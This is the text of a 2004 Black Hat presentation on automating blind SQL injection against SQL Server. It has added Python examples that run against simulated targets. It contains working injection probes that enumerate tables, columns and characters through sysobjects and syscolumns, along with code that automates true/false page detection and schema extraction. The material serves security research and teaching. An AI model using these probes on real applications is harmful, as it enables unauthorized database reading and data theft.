Blind SQL Injection Automation Techniques by Cameron Hotchkies.pdf (48 slides; printed 8/11/2019)

Blind SQL Injection Automation Techniques
Black Hat Briefings USA 2004
Cameron Hotchkies, [email protected]

What is SQL Injection?
- Client-supplied data passed to an application without appropriate data validation
- Processed as commands by the database

Frequently Used To
- Perform operations on the database
- Bypass authentication mechanisms
- Read otherwise unavailable information from the database
- Write information, such as new user accounts, to the database

Three Forms of SQL Injection
- There are three main forms of SQL Injection used to read information from a database:
  - Redirection and reshaping a query
  - Error message based
  - Blind Injection

Blind SQL Injection
- Blind SQL Injection techniques can include forming queries resulting in boolean values and interpreting the output HTML pages
- SQL Injection can result in significant data leakage and/or data modification attacks
- Blind attacks are essentially playing 20 questions with the web server

Why focus on Blind Injections?
- Blind injections are as common as any other injection
- Blind holes involve a false sense of security on the host
- Requires a larger investment of time to execute manual penetration against

Benefits of an Automated Tool
- We can ask the server as many yes/no questions as we want
- Finding the first letter of a username with a binary search takes 7 requests
- Finding the full username, if it's 8 characters, takes 56 requests
- To find that the username is 8 characters takes 6 requests
- 62 requests just to find the username
- This adds up

Benefits Cont'd
- Assuming it takes

Benefits Cont'd
- If you want non-trivial penetration:
  - Table names
  - Column names
  - Actual data
- This would take hours or days or longer depending on the size of the database

Sound Simple?
An effective tool is more complex than a few shell scripts and netcat

Searching for Integers
- Select a range, usually starting with 0
- Increase the value exponentially by a factor of two until the upper limit is discovered
- Partition halfway between the upper limit and the previous value
- Continue to halve sections until one value remains

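The search procedure above, written out as an added example (this is not code from the slides or from SQueaL). The target is simulated by a `FakeServer` class of this example's own, and the constructed username is its own sample data; all the search needs from a real target is a yes/no answer to a probe of the form "... AND <hidden value> > v", which is the shape used in the enumeration queries later in the deck. The character search is bounded to printable ASCII, which is where the "7 requests per character" figure from the earlier slide comes from.

```python
"""Integer search by exponential probing and halving, plus the character and
string searches built on it.  Added example, not part of the original deck.
`FakeServer` and the username "admin" are constructed for the demonstration.
"""


class FakeServer:
    """Stand-in for the injectable page: evaluates the attacker's boolean
    predicate against a constructed secret and counts the requests it cost."""

    def __init__(self, username):
        self.username = username      # constructed secret; normally lives in the DB
        self.requests = 0

    def ask(self, predicate):
        """One HTTP request: True means the 'true' page came back."""
        self.requests += 1
        return predicate(self.username)


def search_gt(ask, lo, hi):
    """Halve the interval until one value remains.
    Precondition: lo < value <= hi.  ask(v) answers 'is value > v?'."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid
        else:
            hi = mid
    return hi


def find_int(ask, start=0):
    """The slide's procedure: probe start, 2*start, 4*start, ... until the server
    says 'no' (which bounds the value), then bisect between the last 'yes'
    probe and that bound.  No upper limit has to be known in advance."""
    lo, probe = start - 1, max(start, 1)
    while ask(probe):
        lo, probe = probe, probe * 2
    return search_gt(ask, lo, probe)


def find_char(ask):
    """Printable ASCII lies in 32..126, so bounding the search to (0, 127]
    costs exactly 7 requests per character."""
    return chr(search_gt(ask, 0, 127))


def find_string(server):
    """Length first (so we know when to stop), then one character at a time;
    each lambda is the boolean the injected SQL would evaluate server-side."""
    length = find_int(lambda v: server.ask(lambda s: len(s) > v))
    chars = [find_char(lambda v: server.ask(lambda s: ord(s[i]) > v))
             for i in range(length)]
    return "".join(chars)


if __name__ == "__main__":
    server = FakeServer("admin")
    print(find_string(server), "recovered in", server.requests, "requests")
```

For the five-character sample the length costs 6 requests (four doubling probes, two halvings) and each character 7, matching the arithmetic on the "Benefits" slide.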
Problem
- How do we recognize true vs. false pages from the web server?
  - We take pattern recognition for granted
  - Can't we just do a string compare?
- The whole point of a web application is to have dynamic content
  - It's entirely likely that the section indicating true/false is not the only dynamic content
  - String comparison is suitable for error-based injection but not blind injection

Solution One: Keyword Search
- Requires direct intervention of the user
- User interaction requires effort to be expended, which is what we are trying to minimize

Solution Two: MD5 Sum
- Web applications are designed to be dynamic
- MD5 causes large output changes from small input changes

Google vs. Hoogle [figure]

MD5 Sum Comparison
- MD5 does not handle changes well
- May work on some web applications but not comprehensive

Solution Three: Text Difference Engine
- Text difference tools are designed to highlight informational changes that we are not concerned with
- A lot of effort is wasted to retain information that will simply be discarded

Solution Four: Parse HTML Tree
- Represent text as HTML entities in a tree data structure
- Look for differences in the shape of the trees
- If only non-markup data is changing there will be no way to proceed in automation
- Easier to implement an XHTML parser than a realistic HTML parser

Solution Five: Linear Representation of ASCII Sums
- small input variation = small output variation

Signature Comparison
- Generating base cases
  - Will need base cases for comparison of unknowns
  - We already know guaranteed true/false pages
  - We have multiple options for known base cases
- Easiest is

Sample Signature Set [figure]

Realistic Signature Set [figure]

Tolerance Band Comparison
- Minor changes in textual content result in small overall changes in the sum
- Changes still occur
- Allowing for tolerance instead of exact comparison in sums lessens false negatives
    |known - unknown| / known

Tolerance Band Comparison [figure]

Shortcomings of Tolerance Band Comparison
- It works, but there are a lot of unnecessary comparisons
- Doesn't take advantage of known garbage data

Subtractive Filter
- We can identify sums that are equal between conflicting base cases
- This can be combined with the tolerance band to eliminate unnecessary comparisons

Adaptive Filter
- Allows the application to be profiled before testing against unknowns
- Removes junk data that could skew results
- Requires multiple base cases

Two "Identical" Samples [figure]

Adaptive Filter Applied [figure]

Benefits of Adaptive Filter
- Tolerance is mostly unnecessary at this point
- Removes most dynamic content unrelated to the data leakage

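The signature pipeline from "Solution Five" through the adaptive filter, as an added example that is not code from the slides or from SQueaL. The pages are constructed for the demonstration (a clock line and a visitor counter stand in for dynamic content unrelated to the injection; a welcome/error line carries the true/false signal), and the function names are this example's own. It also shows the MD5 comparison the slides reject failing on two pages of the same class.

```python
"""Per-line ASCII-sum signatures, tolerance band, subtractive and adaptive
filters.  Added example with constructed pages; not part of the original deck.
"""
import hashlib


def render(logged_in, stamp, hits):
    """Constructed stand-in for the injectable page.  Only the welcome/error
    line depends on the injected boolean; the clock and counter are noise."""
    body = ("<p class=ok>Welcome back, member.</p>" if logged_in
            else "<p class=err>No such user or bad password.</p>")
    return "\n".join([
        "<html><head><title>Portal</title></head><body>",
        f"<div id=clock>Generated {stamp}</div>",
        "<div id=nav><a href=/>Home</a> <a href=/help>Help</a></div>",
        body,
        f"<div id=foot>Visitor number {hits}</div>",
        "</body></html>",
    ])


def signature(page):
    """Linear representation: one ASCII sum per line.  A one-character change
    moves one entry a little, where MD5 would change completely.  (Pages
    generated without line breaks collapse to a single sum; see the later
    'Forced CRLF' slide.)"""
    return [sum(map(ord, line)) for line in page.splitlines()]


def within_tolerance(known, unknown, tol):
    """Tolerance band from the slide: |known - unknown| / known <= tol on every
    line; tol = 0 is the exact comparison."""
    if len(known) != len(unknown):
        return False
    return all(abs(k - u) <= tol * k for k, u in zip(known, unknown))


def subtractive_filter(true_sig, false_sig):
    """Lines whose sums agree in the two conflicting base cases carry no
    true/false information; keep only the indices that differ."""
    return [i for i, (t, f) in enumerate(zip(true_sig, false_sig)) if t != f]


def adaptive_filter(samples):
    """Profile several pages of one class: a line that varies between
    'identical' samples is junk (clock, counter) and is dropped."""
    sigs = [signature(p) for p in samples]
    n = min(len(s) for s in sigs)
    return [i for i in range(n) if len({s[i] for s in sigs}) == 1]


def classify(page, true_sig, false_sig, keep, tol=0.0):
    """Compare only the informative line indices in `keep`.  Returns True or
    False, or None when the page matches neither (or both) base cases."""
    sig = signature(page)
    if len(sig) != len(true_sig):
        return None
    pick = lambda s: [s[i] for i in keep]
    hit_t = within_tolerance(pick(true_sig), pick(sig), tol)
    hit_f = within_tolerance(pick(false_sig), pick(sig), tol)
    return None if hit_t == hit_f else hit_t


def demo():
    """Two known-true and two known-false base pages, then two unknowns."""
    trues = [render(True, "2004-07-28 10:15:02", 4412),
             render(True, "2004-07-28 10:15:09", 4413)]
    falses = [render(False, "2004-07-28 10:15:13", 4414),
              render(False, "2004-07-28 10:15:20", 4415)]
    true_sig, false_sig = signature(trues[0]), signature(falses[0])
    stable = set(adaptive_filter(trues)) & set(adaptive_filter(falses))
    keep = [i for i in subtractive_filter(true_sig, false_sig) if i in stable]
    unknown_t = render(True, "2004-07-28 10:16:41", 4420)
    unknown_f = render(False, "2004-07-28 10:16:45", 4421)
    everything = range(len(true_sig))
    md5 = lambda p: hashlib.md5(p.encode()).hexdigest()
    return {
        "md5_same_class_matches": md5(trues[0]) == md5(trues[1]),
        "exact_unfiltered": classify(unknown_t, true_sig, false_sig, everything),
        "tolerance_unfiltered": classify(unknown_t, true_sig, false_sig, everything, tol=0.01),
        "kept_lines": keep,
        "filtered_true": classify(unknown_t, true_sig, false_sig, keep),
        "filtered_false": classify(unknown_f, true_sig, false_sig, keep),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Exact comparison fails on the unknowns because the clock and counter moved; a 1 % tolerance band rescues it for this page; and once the adaptive filter has reduced the signature to the single informative line, exact comparison is enough again, which is the point of the last slide.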
SQueaL
- SQueaL was created alongside the research being presented
- Written in C# for Windows & Linux
  - Both Windows.Forms & Gtk-Sharp GUIs available
- Free for non-commercial use
  - Black Hat Conference CDs include a commercially licensed version: free for you
- Exports data to an XML format for nice presentation to clients/PHBs

SQueaL: Exporting Data
- SQueaL uses its own XML format for saving exploit data

Gathering Table Info
We start with the ID number for each table (xtype = char(85) = 'U' selects user tables):

    ... AND (SELECT COUNT(name) FROM sysobjects WHERE xtype=char(85)) > search_value
    ... AND (SELECT MIN(id) FROM sysobjects WHERE id > prev_table_id AND xtype=char(85)) > search_value

More Table Info
We can now retrieve each table's recognizable name:

    ... AND (SELECT TOP 1 LEN(name) FROM sysobjects WHERE id=table_id AND xtype=char(85)) > search_value
    ... AND (SELECT ASCII(SUBSTRING(name, character_counter, 1)) FROM sysobjects WHERE id=table_id) > search_value

Gathering Field Information
Once we have the table information we can move on to the fields:

    ... AND (SELECT COUNT(name) FROM syscolumns WHERE id=table_id) > search_value
    ... AND (SELECT MIN(colid) FROM syscolumns WHERE colid > prev_colid AND id=table_id) > search_value

Field Info Cont'd
(colid only exists in syscolumns, so all three probes read that table.)

    ... AND (SELECT TOP 1 LEN(name) FROM syscolumns WHERE id=table_id AND colid=colid) > search_value
    ... AND (SELECT ASCII(SUBSTRING(name, character_counter, 1)) FROM syscolumns WHERE id=table_id AND colid=colid) > search_value
    ... AND (SELECT TOP 1 xtype FROM syscolumns WHERE id=table_id AND colid=colid) > search_value

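The table and field enumeration from the last four slides, driven end to end, as an added example (not code from the slides or from SQueaL). The probe text is the slides' own; the injectable application is stood in for by an in-memory SQLite database holding a constructed copy of SQL Server's sysobjects/syscolumns catalog, with the few T-SQL-only pieces (TOP 1, LEN, ASCII, SUBSTRING) mapped onto SQLite so the probes execute unchanged. The `Target` class, the sample tables, and the xtype values put in them (56 and 167, which are SQL Server's codes for int and varchar) are this example's choices, not the deck's.

```python
"""Schema enumeration over a blind yes/no oracle using the probes from the
'Gathering Table Info' .. 'Field Info' slides.  Added example; the SQLite
stand-in and its sample catalog rows are constructed for the demonstration.
"""
import re
import sqlite3

# Probe templates as on the slides; {v} is the search_value being bisected.
TABLE_COUNT = "(SELECT COUNT(name) FROM sysobjects WHERE xtype=char(85)) > {v}"
NEXT_TABLE = "(SELECT MIN(id) FROM sysobjects WHERE id > {prev} AND xtype=char(85)) > {v}"
TABLE_LEN = "(SELECT TOP 1 LEN(name) FROM sysobjects WHERE id={tid} AND xtype=char(85)) > {v}"
TABLE_CHAR = "(SELECT ASCII(SUBSTRING(name, {pos}, 1)) FROM sysobjects WHERE id={tid}) > {v}"
COL_COUNT = "(SELECT COUNT(name) FROM syscolumns WHERE id={tid}) > {v}"
NEXT_COL = "(SELECT MIN(colid) FROM syscolumns WHERE colid > {prev} AND id={tid}) > {v}"
COL_LEN = "(SELECT TOP 1 LEN(name) FROM syscolumns WHERE id={tid} AND colid={cid}) > {v}"
COL_CHAR = "(SELECT ASCII(SUBSTRING(name, {pos}, 1)) FROM syscolumns WHERE id={tid} AND colid={cid}) > {v}"
COL_TYPE = "(SELECT TOP 1 xtype FROM syscolumns WHERE id={tid} AND colid={cid}) > {v}"


class Target:
    """Stand-in for the vulnerable page: ask(cond) is True when the page built
    from '... AND <cond>' came back as the 'true' page."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        # T-SQL functions the probes use that SQLite lacks (or names differently).
        self.db.create_function("LEN", 1, len)
        self.db.create_function("ASCII", 1, ord)
        self.db.create_function("SUBSTRING", 3, lambda s, i, n: s[i - 1:i - 1 + n])
        self.db.executescript("""
            CREATE TABLE sysobjects(id INTEGER, name TEXT, xtype TEXT);
            CREATE TABLE syscolumns(id INTEGER, colid INTEGER, name TEXT, xtype INTEGER);
            INSERT INTO sysobjects VALUES (5,'sysusers','S'), (21,'users','U'), (37,'orders','U');
            INSERT INTO syscolumns VALUES (21,1,'id',56), (21,2,'login',167), (21,3,'pwd',167),
                                          (37,1,'id',56), (37,2,'total',56);
        """)
        self.requests = 0

    def ask(self, cond):
        self.requests += 1
        # SQLite has no TOP; rewrite 'TOP 1 ... )' as '... LIMIT 1)'.
        cond = re.sub(r"\(SELECT TOP 1 (.*)\) > ", r"(SELECT \1 LIMIT 1) > ", cond)
        row = self.db.execute("SELECT " + cond).fetchone()
        return bool(row[0])        # NULL (no such row) compares false, as in T-SQL


def search_gt(ask, lo, hi):
    """Bisect; precondition lo < value <= hi, ask(v) answers 'value > v?'."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        lo, hi = (mid, hi) if ask(mid) else (lo, mid)
    return hi


def find_int(ask, start=0):
    """Double a probe until it overshoots, then bisect (the integer-search slide)."""
    lo, probe = start - 1, max(start, 1)
    while ask(probe):
        lo, probe = probe, probe * 2
    return search_gt(ask, lo, probe)


def read_name(t, len_tmpl, char_tmpl, **ids):
    """Name length first (sysname holds at most 128 characters), then each
    character by ASCII code; SUBSTRING's character_counter is 1-based."""
    n = search_gt(lambda v: t.ask(len_tmpl.format(v=v, **ids)), 0, 128)
    return "".join(chr(search_gt(lambda v: t.ask(char_tmpl.format(v=v, pos=p, **ids)), 0, 127))
                   for p in range(1, n + 1))


def enumerate_schema(t):
    """Walk user tables by ascending id (the count says when to stop), then
    each table's columns by ascending colid, recording name and xtype."""
    schema, tid = {}, 0
    for _ in range(find_int(lambda v: t.ask(TABLE_COUNT.format(v=v)))):
        tid = find_int(lambda v: t.ask(NEXT_TABLE.format(prev=tid, v=v)), start=tid + 1)
        table = read_name(t, TABLE_LEN, TABLE_CHAR, tid=tid)
        cid, cols = 0, {}
        for _ in range(find_int(lambda v: t.ask(COL_COUNT.format(tid=tid, v=v)))):
            cid = find_int(lambda v: t.ask(NEXT_COL.format(tid=tid, prev=cid, v=v)), start=cid + 1)
            name = read_name(t, COL_LEN, COL_CHAR, tid=tid, cid=cid)
            cols[name] = find_int(lambda v: t.ask(COL_TYPE.format(tid=tid, cid=cid, v=v)))
        schema[table] = cols
    return schema


if __name__ == "__main__":
    target = Target()
    print(enumerate_schema(target), "in", target.requests, "requests")
```

Taking the table count first is what makes the walk terminate cleanly: once the last user table has been read, MIN(id) over "id > prev" is NULL, the page is always the false page, and a search with no count to stop on would happily "find" a bogus id.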
Field Data Types
- Gathering field data types is faster but requires knowledge of the type mapping (e.g. which xtype codes stand for char and varchar)
- Doesn't lower the "bar" for finding exploits
- Troubles with no carriage returns / auto-generated HTML

Forced CRLF
- What happens when HTML is generated without carriage returns?
  - Natural tendency to force carriage returns
  - This will throw off the data
- At this point an HTML parser would be needed

Conclusion
- Same techniques can be utilized with queries indicating invalid SQL
  - Treat these as questions such as "Is this syntax valid?", which is now a yes/no question
- MD5: bad for these purposes
- Same techniques can be utilized in other applications to interpret results from HTML responses
  - XPath Injection
  - LDAP Injection
- Use parameterized code in an appropriate fashion to call stored procedures

References & Suggested Papers
- Advanced SQL Injection in SQL Server Applications - Chris Anley, NGS Systems, http://www.nextgenss.com/papers/advanced_sql_injection.pdf
- (more) Advanced SQL Injection - Chris Anley, NGS Systems, http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
- Blind SQL Injection: Are your web-apps Vulnerable? - Kevin Spett, SPI Dynamics, http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

Questions & Answers
This and other tools are available for download at http://www.0x90.org/releases/